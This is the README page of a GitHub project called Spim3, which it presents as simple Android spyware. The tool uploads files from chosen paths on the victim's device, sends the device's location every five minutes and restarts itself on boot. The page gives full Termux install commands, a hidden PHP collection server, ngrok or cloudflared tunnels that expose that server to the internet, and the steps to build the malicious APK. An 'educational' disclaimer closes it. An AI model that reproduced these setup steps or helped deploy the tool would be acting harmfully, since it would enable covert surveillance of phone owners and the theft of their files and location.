Skip to content

Latest commit

 

History

History
50 lines (37 loc) · 1.35 KB

README.md

File metadata and controls

50 lines (37 loc) · 1.35 KB

Spim3

Simple Android spyware that uploads all files from user selected paths.

Screenshot


Features

  1. Upload all files from given path.
  2. Upload also newly created files.
  3. Send location every 5 minutes.
  4. Persistent, auto start on boot.

Termux Installation

pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone http://github.com/7wp81x/Spim3
cd Spim3/
bash spim3.sh

Example usage:

- open new session
cd Files/
php -S 127.0.0.1:8000 > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url 127.0.0.1:8080

- Tunnel using ngrok
ngrok http 8080

- on main session:

bash spim3.sh

- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M

Download Apktool_M

Download

Disclaimer!!!

This tool/program is designed for educational and ethical testing purposes only, The author strictly prohibits the use of this tool/program for any unauthorized or malicious activities. By using this tool, you agree that you are responsible for your actions and compliance with applicable laws and regulations. The author disclaims any liability for damages or legal consequences resulting from misuse. Use responsibly and ethically.